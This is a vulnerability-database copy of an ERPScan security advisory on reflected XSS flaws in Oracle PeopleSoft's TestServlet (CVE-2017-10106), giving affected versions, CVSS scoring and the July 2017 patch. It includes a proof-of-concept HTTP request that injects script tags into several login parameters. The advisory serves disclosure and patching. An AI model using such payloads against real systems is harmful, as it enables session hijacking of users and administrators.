Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
erpscanERPScanERPSCAN-17-037
HistoryJan 26, 2017 - 12:00 a.m.

Multiple XSS Vulnerabilities in TestServlet (PeopleSoft)

2017-01-2600:00:00
erpscan.io
545

EPSS

0.002

Percentile

54.8%

JSON

Application: Oracle PeopleSoft **Versions Affected:**PeopleTools 8.54, 8.55 Vendor:Oracle **Bugs:**XSS **Reported:**26.01.2017 **Vendor response:**27.01.2017 **Date of Public Advisory:**18.07.2017 **Reference: **Oracle CPU July 2017 Authors: Dmitri Iudin aka @ret5et (ERPScan)

VULNERABILITY INFORMATION

Class: XSS [CWE-79]
Risk: Medium
Impact: Modify displayed content from a Web site, steal authentication information of a user
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10106

CVSS Information

CVSS Base Score v3: 6.1 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) Required ®
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed ©
C: Impact to Confidentiality Low (L)
I: Impact to Integrity Low (L)
A: Impact to Availability None (N)

VULNERABILITY DESCRIPTION

An attacker can use a special HTTP request to hijack session data of administrators or users of the web resource.

VULNERABLE PACKAGES

ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU July 2017

TECHNICAL DESCRIPTION

Proof of Concept

POST /pspc/test?userID=<script>alert(1)</script>&password=<script>alert(2)</script>&languageCode==<script>alert(5)</script>&siteName=<script>alert(3)</script>&CREFName=<script>alert(4)</script>&portalName=<script>alert(6)</script>&command=login HTTP/1.1 Host: 172.16.2.230:8000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 twitter:@ret5et Accept-Encoding: gzip, deflate Content-Length: 0

1

2

3

4

5

|

POST /pspc/test?userID=<script>alert(1)</script>&password=<script>alert(2)</script>&languageCode==<script>alert(5)</script>&siteName=<script>alert(3)</script>&CREFName=<script>alert(4)</script>&portalName=<script>alert(6)</script>&command=login HTTP/1.1

Host: 172.16.2.230:8000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 twitter:@ret5et

Accept-Encoding: gzip, deflate

Content-Length: 0

—|—

Related

cvelist 1
prion 1
nvd 1
cve 1
zdt 1
packetstorm 1
oracle 1
cvelist
cvelist
CVE-2017-10106
2017-08-08 15:00:00
prion
prion
Code injection
2017-08-08 15:29:00
nvd
nvd
CVE-2017-10106
2017-08-08 15:29:03
cve
cve
CVE-2017-10106
2017-08-08 15:29:03
zdt
zdt
Oracle PeopleSoft ToolsRelease 8.55.03 / ToolsReleaseDB 8.55 / HCM 9.2 XSS Vulnerabilities
2017-07-22 00:00:00
packetstorm
packetstorm
PeopleSoft ToolsRelease 8.55.03 / ToolsReleaseDB 8.55 / HCM 9.2 XSS
2017-07-21 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - July 2017
2018-03-20 00:00:00

EPSS

0.002

Percentile

54.8%

JSON
Related for ERPSCAN-17-037
cvelist1prion1nvd1cve1zdt1packetstorm1oracle1